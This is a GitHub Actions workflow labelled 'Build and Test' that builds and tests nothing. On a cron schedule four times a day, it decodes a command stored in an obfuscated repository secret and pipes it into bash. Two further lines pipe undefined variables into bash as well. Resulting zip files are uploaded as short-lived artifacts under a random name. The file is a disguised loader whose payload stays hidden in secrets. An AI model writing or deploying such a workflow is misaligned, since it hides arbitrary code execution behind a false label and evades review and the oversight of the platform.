name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '34 3,9,15,21 * * *'
jobs:
  start:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute task
        env:
          vz1: ${{ secrets.vz1 }}
        run: |
          printf '%s' "$vz1" | jq -r .mhsan2 | /bin/bash
          echo $si0 | jq -r .z5331 | /bin/bash
          echo $xiy93 | jq -r .r92944 | /bin/bash

      - name: Persist data
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: NPQWAAnH
          path: "*.zip"
          retention-days: 1
